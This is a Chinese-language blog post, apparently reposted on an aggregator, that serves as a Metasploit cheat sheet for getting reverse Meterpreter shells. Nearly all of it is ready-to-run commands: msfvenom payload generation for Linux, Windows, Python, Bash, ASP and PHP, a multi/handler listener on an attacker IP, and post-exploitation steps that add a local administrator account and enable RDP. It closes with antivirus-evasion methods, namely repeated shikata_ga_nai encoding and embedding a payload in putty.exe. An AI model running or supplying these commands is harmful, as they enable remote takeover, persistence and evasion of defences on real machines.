反弹meterpreter方法 Posted 2023-04-25 wutiangui
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了反弹meterpreter方法相关的知识,希望对你有一定的参考价值。
启动 msfconsole
msfconsole下依次执行如下命令 [use exploit/multi/handler] [set payload windows/meterpreter/reverse_tcp]
//192.168.25.128是攻击机IP [set LHOST 192.168.25.128] [set LPORT 1234] [run] 开始监听即可 靶机执行shell.exe即可反弹meterprete
Msf小结
Msfvenom是有效负载生成和编码的组合。
生成攻击载荷
Linux下反弹Meterpreter shell
1
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<your port to connect on> -e -f elf -a x86 --platform linux -o shell
C反弹shell
1
msfvenom -p windows/shell_reverse_tcp LHOST=<your IP Address> LPORT=<your port to connect on> -b "\x00\x0a\x0d" -a x86 --platform win -f c
Python反弹shell
1
msfvenom -p cmd/unix/reverse_python LHOST=<your IP Address> LPORT=<your port to connect on> -o shell.py
Asp反弹shell
1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp
Bash反弹shell
1
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh
PHP反弹shell
1
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw -o shell.php
Windows反弹shell
1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe
64位系统要加x64
1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe
Windows提权
第一步生成Windows攻击载荷
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=本机IP -f exe >/home/shell.exe
第二步MSF监听
123456
use exploit/multi/handler //设置模块set payload windows/meterpreter/reverse_tcp //配置payloadshow options //显示选项set LHOST 本机IP //设置ip地址,注意,这个要与上面攻击载荷里面的相同set LPORT 端口 //设置端口,这个也要相同exploit //执行攻击
第三步提权
1234567
shell //进入终端net user //查看用户net user admin admin /add //创建一个admin用户net localgroup administrators admin /add //提权net user admin //admin用户的信息exit //退出bash终端run getgui -e //开启3389端口
第四步开启远程连接
1234
开启远程桌面run post/windows/manage/enable_rdp连接rdesktop -u 用户名 -p 密码
免杀
多次编码免杀
1
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -f exe -o /var/www/html/reverse_http_encode.exe
自定义二进制代码的文件模板免杀
1
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -x ~/putty.exe
以上是关于反弹meterpreter方法的主要内容,如果未能解决你的问题,请参考以下文章
加载dll文件反弹shell
msfconsole web后门
msf建立php反弹shell
PHP后门反弹演示
Msf小结
【渗透测试】-工具之MSF